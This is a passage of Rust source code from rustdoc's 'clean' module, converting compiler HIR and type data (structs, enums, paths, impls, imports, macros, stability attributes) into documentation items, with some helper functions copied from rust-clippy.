hir::VisibilityKind::Crate(_) => Visibility::Crate,
hir::VisibilityKind::Restricted { ref path, .. } => {
let path = path.clean(cx);
let did = register_def(cx, path.def);
Visibility::Restricted(did, path)
}
})
}
}
impl Clean<Option<Visibility>> for ty::Visibility {
fn clean(&self, _: &DocContext) -> Option<Visibility> {
Some(if *self == ty::Visibility::Public { Public } else { Inherited })
}
}
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct Struct {
pub struct_type: doctree::StructType,
pub generics: Generics,
pub fields: Vec<Item>,
pub fields_stripped: bool,
}
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct Union {
pub struct_type: doctree::StructType,
pub generics: Generics,
pub fields: Vec<Item>,
pub fields_stripped: bool,
}
impl Clean<Vec<Item>> for doctree::Struct {
fn clean(&self, cx: &DocContext) -> Vec<Item> {
let name = self.name.clean(cx);
let mut ret = get_auto_traits_with_node_id(cx, self.id, name.clone());
ret.push(Item {
name: Some(name),
attrs: self.attrs.clean(cx),
source: self.whence.clean(cx),
def_id: cx.tcx.hir.local_def_id(self.id),
visibility: self.vis.clean(cx),
stability: self.stab.clean(cx),
deprecation: self.depr.clean(cx),
inner: StructItem(Struct {
struct_type: self.struct_type,
generics: self.generics.clean(cx),
fields: self.fields.clean(cx),
fields_stripped: false,
}),
});
ret
}
}
impl Clean<Vec<Item>> for doctree::Union {
fn clean(&self, cx: &DocContext) -> Vec<Item> {
let name = self.name.clean(cx);
let mut ret = get_auto_traits_with_node_id(cx, self.id, name.clone());
ret.push(Item {
name: Some(name),
attrs: self.attrs.clean(cx),
source: self.whence.clean(cx),
def_id: cx.tcx.hir.local_def_id(self.id),
visibility: self.vis.clean(cx),
stability: self.stab.clean(cx),
deprecation: self.depr.clean(cx),
inner: UnionItem(Union {
struct_type: self.struct_type,
generics: self.generics.clean(cx),
fields: self.fields.clean(cx),
fields_stripped: false,
}),
});
ret
}
}
/// This is a more limited form of the standard Struct, different in that
/// it lacks the things most items have (name, id, parameterization). Found
/// only as a variant in an enum.
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct VariantStruct {
pub struct_type: doctree::StructType,
pub fields: Vec<Item>,
pub fields_stripped: bool,
}
impl Clean<VariantStruct> for ::rustc::hir::VariantData {
fn clean(&self, cx: &DocContext) -> VariantStruct {
VariantStruct {
struct_type: doctree::struct_type_from_def(self),
fields: self.fields().iter().map(|x| x.clean(cx)).collect(),
fields_stripped: false,
}
}
}
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct Enum {
pub variants: Vec<Item>,
pub generics: Generics,
pub variants_stripped: bool,
}
impl Clean<Vec<Item>> for doctree::Enum {
fn clean(&self, cx: &DocContext) -> Vec<Item> {
let name = self.name.clean(cx);
let mut ret = get_auto_traits_with_node_id(cx, self.id, name.clone());
ret.push(Item {
name: Some(name),
attrs: self.attrs.clean(cx),
source: self.whence.clean(cx),
def_id: cx.tcx.hir.local_def_id(self.id),
visibility: self.vis.clean(cx),
stability: self.stab.clean(cx),
deprecation: self.depr.clean(cx),
inner: EnumItem(Enum {
variants: self.variants.clean(cx),
generics: self.generics.clean(cx),
variants_stripped: false,
}),
});
ret
}
}
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct Variant {
pub kind: VariantKind,
}
impl Clean<Item> for doctree::Variant {
fn clean(&self, cx: &DocContext) -> Item {
Item {
name: Some(self.name.clean(cx)),
attrs: self.attrs.clean(cx),
source: self.whence.clean(cx),
visibility: None,
stability: self.stab.clean(cx),
deprecation: self.depr.clean(cx),
def_id: cx.tcx.hir.local_def_id(self.def.id()),
inner: VariantItem(Variant {
kind: self.def.clean(cx),
}),
}
}
}
impl<'tcx> Clean<Item> for ty::VariantDef {
fn clean(&self, cx: &DocContext) -> Item {
let kind = match self.ctor_kind {
CtorKind::Const => VariantKind::CLike,
CtorKind::Fn => {
VariantKind::Tuple(
self.fields.iter().map(|f| cx.tcx.type_of(f.did).clean(cx)).collect()
)
}
CtorKind::Fictive => {
VariantKind::Struct(VariantStruct {
struct_type: doctree::Plain,
fields_stripped: false,
fields: self.fields.iter().map(|field| {
Item {
source: cx.tcx.def_span(field.did).clean(cx),
name: Some(field.ident.name.clean(cx)),
attrs: cx.tcx.get_attrs(field.did).clean(cx),
visibility: field.vis.clean(cx),
def_id: field.did,
stability: get_stability(cx, field.did),
deprecation: get_deprecation(cx, field.did),
inner: StructFieldItem(cx.tcx.type_of(field.did).clean(cx))
}
}).collect()
})
}
};
Item {
name: Some(self.name.clean(cx)),
attrs: inline::load_attrs(cx, self.did),
source: cx.tcx.def_span(self.did).clean(cx),
visibility: Some(Inherited),
def_id: self.did,
inner: VariantItem(Variant { kind: kind }),
stability: get_stability(cx, self.did),
deprecation: get_deprecation(cx, self.did),
}
}
}
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub enum VariantKind {
CLike,
Tuple(Vec<Type>),
Struct(VariantStruct),
}
impl Clean<VariantKind> for hir::VariantData {
fn clean(&self, cx: &DocContext) -> VariantKind {
if self.is_struct() {
VariantKind::Struct(self.clean(cx))
} else if self.is_unit() {
VariantKind::CLike
} else {
VariantKind::Tuple(self.fields().iter().map(|x| x.ty.clean(cx)).collect())
}
}
}
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct Span {
pub filename: FileName,
pub loline: usize,
pub locol: usize,
pub hiline: usize,
pub hicol: usize,
}
impl Span {
pub fn empty() -> Span {
Span {
filename: FileName::Anon,
loline: 0, locol: 0,
hiline: 0, hicol: 0,
}
}
}
impl Clean<Span> for syntax_pos::Span {
fn clean(&self, cx: &DocContext) -> Span {
if self.is_dummy() {
return Span::empty();
}
let cm = cx.sess().codemap();
let filename = cm.span_to_filename(*self);
let lo = cm.lookup_char_pos(self.lo());
let hi = cm.lookup_char_pos(self.hi());
Span {
filename,
loline: lo.line,
locol: lo.col.to_usize(),
hiline: hi.line,
hicol: hi.col.to_usize(),
}
}
}
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Debug, Hash)]
pub struct Path {
pub global: bool,
pub def: Def,
pub segments: Vec<PathSegment>,
}
impl Path {
pub fn singleton(name: String) -> Path {
Path {
global: false,
def: Def::Err,
segments: vec![PathSegment {
name,
args: GenericArgs::AngleBracketed {
lifetimes: Vec::new(),
types: Vec::new(),
bindings: Vec::new(),
}
}]
}
}
pub fn last_name(&self) -> &str {
self.segments.last().unwrap().name.as_str()
}
}
impl Clean<Path> for hir::Path {
fn clean(&self, cx: &DocContext) -> Path {
Path {
global: self.is_global(),
def: self.def,
segments: if self.is_global() { &self.segments[1..] } else { &self.segments }.clean(cx),
}
}
}
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Debug, Hash)]
pub enum GenericArgs {
AngleBracketed {
lifetimes: Vec<Lifetime>,
types: Vec<Type>,
bindings: Vec<TypeBinding>,
},
Parenthesized {
inputs: Vec<Type>,
output: Option<Type>,
}
}
impl Clean<GenericArgs> for hir::GenericArgs {
fn clean(&self, cx: &DocContext) -> GenericArgs {
if self.parenthesized {
let output = self.bindings[0].ty.clean(cx);
GenericArgs::Parenthesized {
inputs: self.inputs().clean(cx),
output: if output != Type::Tuple(Vec::new()) { Some(output) } else { None }
}
} else {
let (mut lifetimes, mut types) = (vec![], vec![]);
let mut elided_lifetimes = true;
for arg in &self.args {
match arg {
GenericArg::Lifetime(lt) => {
if !lt.is_elided() {
elided_lifetimes = false;
}
lifetimes.push(lt.clean(cx));
}
GenericArg::Type(ty) => {
types.push(ty.clean(cx));
}
}
}
GenericArgs::AngleBracketed {
lifetimes: if elided_lifetimes { vec![] } else { lifetimes },
types,
bindings: self.bindings.clean(cx),
}
}
}
}
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Debug, Hash)]
pub struct PathSegment {
pub name: String,
pub args: GenericArgs,
}
impl Clean<PathSegment> for hir::PathSegment {
fn clean(&self, cx: &DocContext) -> PathSegment {
PathSegment {
name: self.ident.name.clean(cx),
args: self.with_generic_args(|generic_args| generic_args.clean(cx))
}
}
}
fn strip_type(ty: Type) -> Type {
match ty {
Type::ResolvedPath { path, typarams, did, is_generic } => {
Type::ResolvedPath { path: strip_path(&path), typarams, did, is_generic }
}
Type::Tuple(inner_tys) => {
Type::Tuple(inner_tys.iter().map(|t| strip_type(t.clone())).collect())
}
Type::Slice(inner_ty) => Type::Slice(Box::new(strip_type(*inner_ty))),
Type::Array(inner_ty, s) => Type::Array(Box::new(strip_type(*inner_ty)), s),
Type::Unique(inner_ty) => Type::Unique(Box::new(strip_type(*inner_ty))),
Type::RawPointer(m, inner_ty) => Type::RawPointer(m, Box::new(strip_type(*inner_ty))),
Type::BorrowedRef { lifetime, mutability, type_ } => {
Type::BorrowedRef { lifetime, mutability, type_: Box::new(strip_type(*type_)) }
}
Type::QPath { name, self_type, trait_ } => {
Type::QPath {
name,
self_type: Box::new(strip_type(*self_type)), trait_: Box::new(strip_type(*trait_))
}
}
_ => ty
}
}
fn strip_path(path: &Path) -> Path {
let segments = path.segments.iter().map(|s| {
PathSegment {
name: s.name.clone(),
args: GenericArgs::AngleBracketed {
lifetimes: Vec::new(),
types: Vec::new(),
bindings: Vec::new(),
}
}
}).collect();
Path {
global: path.global,
def: path.def.clone(),
segments,
}
}
fn qpath_to_string(p: &hir::QPath) -> String {
let segments = match *p {
hir::QPath::Resolved(_, ref path) => &path.segments,
hir::QPath::TypeRelative(_, ref segment) => return segment.ident.to_string(),
};
let mut s = String::new();
for (i, seg) in segments.iter().enumerate() {
if i > 0 {
s.push_str("::");
}
if seg.ident.name != keywords::CrateRoot.name() {
s.push_str(&*seg.ident.as_str());
}
}
s
}
impl Clean<String> for ast::Name {
fn clean(&self, _: &DocContext) -> String {
self.to_string()
}
}
impl Clean<String> for InternedString {
fn clean(&self, _: &DocContext) -> String {
self.to_string()
}
}
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct Typedef {
pub type_: Type,
pub generics: Generics,
}
impl Clean<Item> for doctree::Typedef {
fn clean(&self, cx: &DocContext) -> Item {
Item {
name: Some(self.name.clean(cx)),
attrs: self.attrs.clean(cx),
source: self.whence.clean(cx),
def_id: cx.tcx.hir.local_def_id(self.id.clone()),
visibility: self.vis.clean(cx),
stability: self.stab.clean(cx),
deprecation: self.depr.clean(cx),
inner: TypedefItem(Typedef {
type_: self.ty.clean(cx),
generics: self.gen.clean(cx),
}, false),
}
}
}
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Debug, Hash)]
pub struct BareFunctionDecl {
pub unsafety: hir::Unsafety,
pub generic_params: Vec<GenericParamDef>,
pub decl: FnDecl,
pub abi: Abi,
}
impl Clean<BareFunctionDecl> for hir::BareFnTy {
fn clean(&self, cx: &DocContext) -> BareFunctionDecl {
let (generic_params, decl) = enter_impl_trait(cx, || {
(self.generic_params.clean(cx), (&*self.decl, &self.arg_names[..]).clean(cx))
});
BareFunctionDecl {
unsafety: self.unsafety,
abi: self.abi,
decl,
generic_params,
}
}
}
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct Static {
pub type_: Type,
pub mutability: Mutability,
/// It's useful to have the value of a static documented, but I have no
/// desire to represent expressions (that'd basically be all of the AST,
/// which is huge!). So, have a string.
pub expr: String,
}
impl Clean<Item> for doctree::Static {
fn clean(&self, cx: &DocContext) -> Item {
debug!("cleaning static {}: {:?}", self.name.clean(cx), self);
Item {
name: Some(self.name.clean(cx)),
attrs: self.attrs.clean(cx),
source: self.whence.clean(cx),
def_id: cx.tcx.hir.local_def_id(self.id),
visibility: self.vis.clean(cx),
stability: self.stab.clean(cx),
deprecation: self.depr.clean(cx),
inner: StaticItem(Static {
type_: self.type_.clean(cx),
mutability: self.mutability.clean(cx),
expr: print_const_expr(cx, self.expr),
}),
}
}
}
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct Constant {
pub type_: Type,
pub expr: String,
}
impl Clean<Item> for doctree::Constant {
fn clean(&self, cx: &DocContext) -> Item {
Item {
name: Some(self.name.clean(cx)),
attrs: self.attrs.clean(cx),
source: self.whence.clean(cx),
def_id: cx.tcx.hir.local_def_id(self.id),
visibility: self.vis.clean(cx),
stability: self.stab.clean(cx),
deprecation: self.depr.clean(cx),
inner: ConstantItem(Constant {
type_: self.type_.clean(cx),
expr: print_const_expr(cx, self.expr),
}),
}
}
}
#[derive(Debug, Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Copy, Hash)]
pub enum Mutability {
Mutable,
Immutable,
}
impl Clean<Mutability> for hir::Mutability {
fn clean(&self, _: &DocContext) -> Mutability {
match self {
&hir::MutMutable => Mutable,
&hir::MutImmutable => Immutable,
}
}
}
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Copy, Debug, Hash)]
pub enum ImplPolarity {
Positive,
Negative,
}
impl Clean<ImplPolarity> for hir::ImplPolarity {
fn clean(&self, _: &DocContext) -> ImplPolarity {
match self {
&hir::ImplPolarity::Positive => ImplPolarity::Positive,
&hir::ImplPolarity::Negative => ImplPolarity::Negative,
}
}
}
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct Impl {
pub unsafety: hir::Unsafety,
pub generics: Generics,
pub provided_trait_methods: FxHashSet<String>,
pub trait_: Option<Type>,
pub for_: Type,
pub items: Vec<Item>,
pub polarity: Option<ImplPolarity>,
pub synthetic: bool,
}
pub fn get_auto_traits_with_node_id(cx: &DocContext, id: ast::NodeId, name: String) -> Vec<Item> {
let finder = AutoTraitFinder::new(cx);
finder.get_with_node_id(id, name)
}
pub fn get_auto_traits_with_def_id(cx: &DocContext, id: DefId) -> Vec<Item> {
let finder = AutoTraitFinder::new(cx);
finder.get_with_def_id(id)
}
impl Clean<Vec<Item>> for doctree::Impl {
fn clean(&self, cx: &DocContext) -> Vec<Item> {
let mut ret = Vec::new();
let trait_ = self.trait_.clean(cx);
let items = self.items.clean(cx);
// If this impl block is an implementation of the Deref trait, then we
// need to try inlining the target's inherent impl blocks as well.
if trait_.def_id() == cx.tcx.lang_items().deref_trait() {
build_deref_target_impls(cx, &items, &mut ret);
}
let provided = trait_.def_id().map(|did| {
cx.tcx.provided_trait_methods(did)
.into_iter()
.map(|meth| meth.ident.to_string())
.collect()
}).unwrap_or(FxHashSet());
ret.push(Item {
name: None,
attrs: self.attrs.clean(cx),
source: self.whence.clean(cx),
def_id: cx.tcx.hir.local_def_id(self.id),
visibility: self.vis.clean(cx),
stability: self.stab.clean(cx),
deprecation: self.depr.clean(cx),
inner: ImplItem(Impl {
unsafety: self.unsafety,
generics: self.generics.clean(cx),
provided_trait_methods: provided,
trait_,
for_: self.for_.clean(cx),
items,
polarity: Some(self.polarity.clean(cx)),
synthetic: false,
})
});
ret
}
}
fn build_deref_target_impls(cx: &DocContext,
items: &[Item],
ret: &mut Vec<Item>) {
use self::PrimitiveType::*;
let tcx = cx.tcx;
for item in items {
let target = match item.inner {
TypedefItem(ref t, true) => &t.type_,
_ => continue,
};
let primitive = match *target {
ResolvedPath { did, .. } if did.is_local() => continue,
ResolvedPath { did, .. } => {
// We set the last parameter to false to avoid looking for auto-impls for traits
// and therefore avoid an ICE.
// The reason behind this is that auto-traits don't propagate through Deref so
// we're not supposed to synthesise impls for them.
ret.extend(inline::build_impls(cx, did, false));
continue
}
_ => match target.primitive_type() {
Some(prim) => prim,
None => continue,
}
};
let did = match primitive {
Isize => tcx.lang_items().isize_impl(),
I8 => tcx.lang_items().i8_impl(),
I16 => tcx.lang_items().i16_impl(),
I32 => tcx.lang_items().i32_impl(),
I64 => tcx.lang_items().i64_impl(),
I128 => tcx.lang_items().i128_impl(),
Usize => tcx.lang_items().usize_impl(),
U8 => tcx.lang_items().u8_impl(),
U16 => tcx.lang_items().u16_impl(),
U32 => tcx.lang_items().u32_impl(),
U64 => tcx.lang_items().u64_impl(),
U128 => tcx.lang_items().u128_impl(),
F32 => tcx.lang_items().f32_impl(),
F64 => tcx.lang_items().f64_impl(),
Char => tcx.lang_items().char_impl(),
Bool => None,
Str => tcx.lang_items().str_impl(),
Slice => tcx.lang_items().slice_impl(),
Array => tcx.lang_items().slice_impl(),
Tuple => None,
Unit => None,
RawPointer => tcx.lang_items().const_ptr_impl(),
Reference => None,
Fn => None,
Never => None,
};
if let Some(did) = did {
if !did.is_local() {
inline::build_impl(cx, did, ret);
}
}
}
}
impl Clean<Item> for doctree::ExternCrate {
fn clean(&self, cx: &DocContext) -> Item {
Item {
name: None,
attrs: self.attrs.clean(cx),
source: self.whence.clean(cx),
def_id: DefId { krate: self.cnum, index: CRATE_DEF_INDEX },
visibility: self.vis.clean(cx),
stability: None,
deprecation: None,
inner: ExternCrateItem(self.name.clean(cx), self.path.clone())
}
}
}
impl Clean<Vec<Item>> for doctree::Import {
fn clean(&self, cx: &DocContext) -> Vec<Item> {
// We consider inlining the documentation of `pub use` statements, but we
// forcefully don't inline if this is not public or if the
// #[doc(no_inline)] attribute is present.
// Don't inline doc(hidden) imports so they can be stripped at a later stage.
let denied = !self.vis.node.is_pub() || self.attrs.iter().any(|a| {
a.name() == "doc" && match a.meta_item_list() {
Some(l) => attr::list_contains_name(&l, "no_inline") ||
attr::list_contains_name(&l, "hidden"),
None => false,
}
});
let path = self.path.clean(cx);
let inner = if self.glob {
if !denied {
let mut visited = FxHashSet();
if let Some(items) = inline::try_inline_glob(cx, path.def, &mut visited) {
return items;
}
}
Import::Glob(resolve_use_source(cx, path))
} else {
let name = self.name;
if !denied {
let mut visited = FxHashSet();
if let Some(items) = inline::try_inline(cx, path.def, name, &mut visited) {
return items;
}
}
Import::Simple(name.clean(cx), resolve_use_source(cx, path))
};
vec![Item {
name: None,
attrs: self.attrs.clean(cx),
source: self.whence.clean(cx),
def_id: cx.tcx.hir.local_def_id(ast::CRATE_NODE_ID),
visibility: self.vis.clean(cx),
stability: None,
deprecation: None,
inner: ImportItem(inner)
}]
}
}
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub enum Import {
// use source as str;
Simple(String, ImportSource),
// use source::*;
Glob(ImportSource)
}
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct ImportSource {
pub path: Path,
pub did: Option<DefId>,
}
impl Clean<Vec<Item>> for hir::ForeignMod {
fn clean(&self, cx: &DocContext) -> Vec<Item> {
let mut items = self.items.clean(cx);
for item in &mut items {
if let ForeignFunctionItem(ref mut f) = item.inner {
f.header.abi = self.abi;
}
}
items
}
}
impl Clean<Item> for hir::ForeignItem {
fn clean(&self, cx: &DocContext) -> Item {
let inner = match self.node {
hir::ForeignItemFn(ref decl, ref names, ref generics) => {
let (generics, decl) = enter_impl_trait(cx, || {
(generics.clean(cx), (&**decl, &names[..]).clean(cx))
});
ForeignFunctionItem(Function {
decl,
generics,
header: hir::FnHeader {
unsafety: hir::Unsafety::Unsafe,
abi: Abi::Rust,
constness: hir::Constness::NotConst,
asyncness: hir::IsAsync::NotAsync,
},
})
}
hir::ForeignItemStatic(ref ty, mutbl) => {
ForeignStaticItem(Static {
type_: ty.clean(cx),
mutability: if mutbl {Mutable} else {Immutable},
expr: "".to_string(),
})
}
hir::ForeignItemType => {
ForeignTypeItem
}
};
Item {
name: Some(self.name.clean(cx)),
attrs: self.attrs.clean(cx),
source: self.span.clean(cx),
def_id: cx.tcx.hir.local_def_id(self.id),
visibility: self.vis.clean(cx),
stability: get_stability(cx, cx.tcx.hir.local_def_id(self.id)),
deprecation: get_deprecation(cx, cx.tcx.hir.local_def_id(self.id)),
inner,
}
}
}
// Utilities
trait ToSource {
fn to_src(&self, cx: &DocContext) -> String;
}
impl ToSource for syntax_pos::Span {
fn to_src(&self, cx: &DocContext) -> String {
debug!("converting span {:?} to snippet", self.clean(cx));
let sn = match cx.sess().codemap().span_to_snippet(*self) {
Ok(x) => x.to_string(),
Err(_) => "".to_string()
};
debug!("got snippet {}", sn);
sn
}
}
fn name_from_pat(p: &hir::Pat) -> String {
use rustc::hir::*;
debug!("Trying to get a name from pattern: {:?}", p);
match p.node {
PatKind::Wild => "_".to_string(),
PatKind::Binding(_, _, ident, _) => ident.to_string(),
PatKind::TupleStruct(ref p, ..) | PatKind::Path(ref p) => qpath_to_string(p),
PatKind::Struct(ref name, ref fields, etc) => {
format!("{} {{ {}{} }}", qpath_to_string(name),
fields.iter().map(|&Spanned { node: ref fp, .. }|
format!("{}: {}", fp.ident, name_from_pat(&*fp.pat)))
.collect::<Vec<String>>().join(", "),
if etc { ", ..." } else { "" }
)
}
PatKind::Tuple(ref elts, _) => format!("({})", elts.iter().map(|p| name_from_pat(&**p))
.collect::<Vec<String>>().join(", ")),
PatKind::Box(ref p) => name_from_pat(&**p),
PatKind::Ref(ref p, _) => name_from_pat(&**p),
PatKind::Lit(..) => {
warn!("tried to get argument name from PatKind::Lit, \
which is silly in function arguments");
"()".to_string()
},
PatKind::Range(..) => panic!("tried to get argument name from PatKind::Range, \
which is not allowed in function arguments"),
PatKind::Slice(ref begin, ref mid, ref end) => {
let begin = begin.iter().map(|p| name_from_pat(&**p));
let mid = mid.as_ref().map(|p| format!("..{}", name_from_pat(&**p))).into_iter();
let end = end.iter().map(|p| name_from_pat(&**p));
format!("[{}]", begin.chain(mid).chain(end).collect::<Vec<_>>().join(", "))
},
}
}
fn print_const(cx: &DocContext, n: &ty::Const) -> String {
match n.val {
ConstValue::Unevaluated(def_id, _) => {
if let Some(node_id) = cx.tcx.hir.as_local_node_id(def_id) {
print_const_expr(cx, cx.tcx.hir.body_owned_by(node_id))
} else {
inline::print_inlined_const(cx, def_id)
}
},
_ => {
let mut s = String::new();
::rustc::mir::fmt_const_val(&mut s, n).unwrap();
// array lengths are obviously usize
if s.ends_with("usize") {
let n = s.len() - "usize".len();
s.truncate(n);
}
s
},
}
}
fn print_const_expr(cx: &DocContext, body: hir::BodyId) -> String {
cx.tcx.hir.node_to_pretty_string(body.node_id)
}
/// Given a type Path, resolve it to a Type using the TyCtxt
fn resolve_type(cx: &DocContext,
path: Path,
id: ast::NodeId) -> Type {
if id == ast::DUMMY_NODE_ID {
debug!("resolve_type({:?})", path);
} else {
debug!("resolve_type({:?},{:?})", path, id);
}
let is_generic = match path.def {
Def::PrimTy(p) => match p {
hir::TyStr => return Primitive(PrimitiveType::Str),
hir::TyBool => return Primitive(PrimitiveType::Bool),
hir::TyChar => return Primitive(PrimitiveType::Char),
hir::TyInt(int_ty) => return Primitive(int_ty.into()),
hir::TyUint(uint_ty) => return Primitive(uint_ty.into()),
hir::TyFloat(float_ty) => return Primitive(float_ty.into()),
},
Def::SelfTy(..) if path.segments.len() == 1 => {
return Generic(keywords::SelfType.name().to_string());
}
Def::TyParam(..) if path.segments.len() == 1 => {
return Generic(format!("{:#}", path));
}
Def::SelfTy(..) | Def::TyParam(..) | Def::AssociatedTy(..) => true,
_ => false,
};
let did = register_def(&*cx, path.def);
ResolvedPath { path: path, typarams: None, did: did, is_generic: is_generic }
}
fn register_def(cx: &DocContext, def: Def) -> DefId {
debug!("register_def({:?})", def);
let (did, kind) = match def {
Def::Fn(i) => (i, TypeKind::Function),
Def::TyAlias(i) => (i, TypeKind::Typedef),
Def::Enum(i) => (i, TypeKind::Enum),
Def::Trait(i) => (i, TypeKind::Trait),
Def::Struct(i) => (i, TypeKind::Struct),
Def::Union(i) => (i, TypeKind::Union),
Def::Mod(i) => (i, TypeKind::Module),
Def::TyForeign(i) => (i, TypeKind::Foreign),
Def::Const(i) => (i, TypeKind::Const),
Def::Static(i, _) => (i, TypeKind::Static),
Def::Variant(i) => (cx.tcx.parent_def_id(i).unwrap(), TypeKind::Enum),
Def::Macro(i, _) => (i, TypeKind::Macro),
Def::SelfTy(Some(def_id), _) => (def_id, TypeKind::Trait),
Def::SelfTy(_, Some(impl_def_id)) => {
return impl_def_id
}
_ => return def.def_id()
};
if did.is_local() { return did }
inline::record_extern_fqn(cx, did, kind);
if let TypeKind::Trait = kind {
inline::record_extern_trait(cx, did);
}
did
}
fn resolve_use_source(cx: &DocContext, path: Path) -> ImportSource {
ImportSource {
did: if path.def == Def::Err {
None
} else {
Some(register_def(cx, path.def))
},
path,
}
}
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct Macro {
pub source: String,
pub imported_from: Option<String>,
}
impl Clean<Item> for doctree::Macro {
fn clean(&self, cx: &DocContext) -> Item {
let name = self.name.clean(cx);
Item {
name: Some(name.clone()),
attrs: self.attrs.clean(cx),
source: self.whence.clean(cx),
visibility: Some(Public),
stability: self.stab.clean(cx),
deprecation: self.depr.clean(cx),
def_id: self.def_id,
inner: MacroItem(Macro {
source: format!("macro_rules! {} {{\n{}}}",
name,
self.matchers.iter().map(|span| {
format!(" {} => {{ ... }};\n", span.to_src(cx))
}).collect::<String>()),
imported_from: self.imported_from.clean(cx),
}),
}
}
}
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct Stability {
pub level: stability::StabilityLevel,
pub feature: String,
pub since: String,
pub deprecated_since: String,
pub deprecated_reason: String,
pub unstable_reason: String,
pub issue: Option<u32>
}
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct Deprecation {
pub since: String,
pub note: String,
}
impl Clean<Stability> for attr::Stability {
fn clean(&self, _: &DocContext) -> Stability {
Stability {
level: stability::StabilityLevel::from_attr_level(&self.level),
feature: self.feature.to_string(),
since: match self.level {
attr::Stable {ref since} => since.to_string(),
_ => "".to_string(),
},
deprecated_since: match self.rustc_depr {
Some(attr::RustcDeprecation {ref since, ..}) => since.to_string(),
_=> "".to_string(),
},
deprecated_reason: match self.rustc_depr {
Some(ref depr) => depr.reason.to_string(),
_ => "".to_string(),
},
unstable_reason: match self.level {
attr::Unstable { reason: Some(ref reason), .. } => reason.to_string(),
_ => "".to_string(),
},
issue: match self.level {
attr::Unstable {issue, ..} => Some(issue),
_ => None,
}
}
}
}
impl<'a> Clean<Stability> for &'a attr::Stability {
fn clean(&self, dc: &DocContext) -> Stability {
(**self).clean(dc)
}
}
impl Clean<Deprecation> for attr::Deprecation {
fn clean(&self, _: &DocContext) -> Deprecation {
Deprecation {
since: self.since.as_ref().map_or("".to_string(), |s| s.to_string()),
note: self.note.as_ref().map_or("".to_string(), |s| s.to_string()),
}
}
}
/// An equality constraint on an associated type, e.g. `A=Bar` in `Foo<A=Bar>`
#[derive(Clone, PartialEq, Eq, RustcDecodable, RustcEncodable, Debug, Hash)]
pub struct TypeBinding {
pub name: String,
pub ty: Type
}
impl Clean<TypeBinding> for hir::TypeBinding {
fn clean(&self, cx: &DocContext) -> TypeBinding {
TypeBinding {
name: self.ident.name.clean(cx),
ty: self.ty.clean(cx)
}
}
}
pub fn def_id_to_path(cx: &DocContext, did: DefId, name: Option<String>) -> Vec<String> {
let crate_name = name.unwrap_or_else(|| cx.tcx.crate_name(did.krate).to_string());
let relative = cx.tcx.def_path(did).data.into_iter().filter_map(|elem| {
// extern blocks have an empty name
let s = elem.data.to_string();
if !s.is_empty() {
Some(s)
} else {
None
}
});
once(crate_name).chain(relative).collect()
}
pub fn enter_impl_trait<F, R>(cx: &DocContext, f: F) -> R
where
F: FnOnce() -> R,
{
let old_bounds = mem::replace(&mut *cx.impl_trait_bounds.borrow_mut(), Default::default());
let r = f();
assert!(cx.impl_trait_bounds.borrow().is_empty());
*cx.impl_trait_bounds.borrow_mut() = old_bounds;
r
}
// Start of code copied from rust-clippy
pub fn get_trait_def_id(tcx: &TyCtxt, path: &[&str], use_local: bool) -> Option<DefId> {
if use_local {
path_to_def_local(tcx, path)
} else {
path_to_def(tcx, path)
}
}
pub fn path_to_def_local(tcx: &TyCtxt, path: &[&str]) -> Option<DefId> {
let krate = tcx.hir.krate();
let mut items = krate.module.item_ids.clone();
let mut path_it = path.iter().peekable();
loop {
let segment = match path_it.next() {
Some(segment) => segment,
None => return None,
};
for item_id in mem::replace(&mut items, HirVec::new()).iter() {
let item = tcx.hir.expect_item(item_id.id);
if item.name == *segment {
if path_it.peek().is_none() {
return Some(tcx.hir.local_def_id(item_id.id))
}
items = match &item.node {
&hir::ItemMod(ref m) => m.item_ids.clone(),
_ => panic!("Unexpected item {:?} in path {:?} path")
};
break;
}
}
}
}
pub fn path_to_def(tcx: &TyCtxt, path: &[&str]) -> Option<DefId> {
let crates = tcx.crates();
let krate = crates
.iter()
.find(|&&krate| tcx.crate_name(krate) == path[0]);
if let Some(krate) = krate {
let krate = DefId {
krate: *krate,
index: CRATE_DEF_INDEX,
};
let mut items = tcx.item_children(krate);
let mut path_it = path.iter().skip(1).peekable();
loop {
let segment = match path_it.next() {
Some(segment) => segment,
None => return None,
};
for item in mem::replace(&mut items, Lrc::new(vec![])).iter() {
if item.ident.name == *segment {
if path_it.peek().is_none() {
return match item.def {
def::Def::Trait(did) => Some(did),
_ => None,
}
}
items = tcx.item_children(item.def.def_id());
break;
}
}
}
} else {
None
}
}
fn get_path_for_type<F>(tcx: TyCtxt, def_id: DefId, def_ctor: F) -> hir::Path
where F: Fn(DefId) -> Def {
struct AbsolutePathBuffer {
names: Vec<String>,
}
impl ty::item_path::ItemPathBuffer for AbsolutePathBuffer {
fn root_mode(&self) -> &ty::item_path::RootMode {
const ABSOLUTE: &'static ty::item_path::RootMode = &ty::item_path::RootMode::Absolute;
ABSOLUTE
}
fn push(&mut self, text: &str) {
self.names.push(text.to_owned());
}
}
let mut apb = AbsolutePathBuffer { names: vec![] };
tcx.push_item_path(&mut apb, def_id);
hir::Path {
span: DUMMY_SP,
def: def_ctor(def_id),
segments: hir::HirVec::from_vec(apb.names.iter().map(|s| hir::PathSegment {
ident: ast::Ident::from_str(&s),
args: None,
infer_types: false,
}).collect())
}
}
// End of code copied from rust-clippy
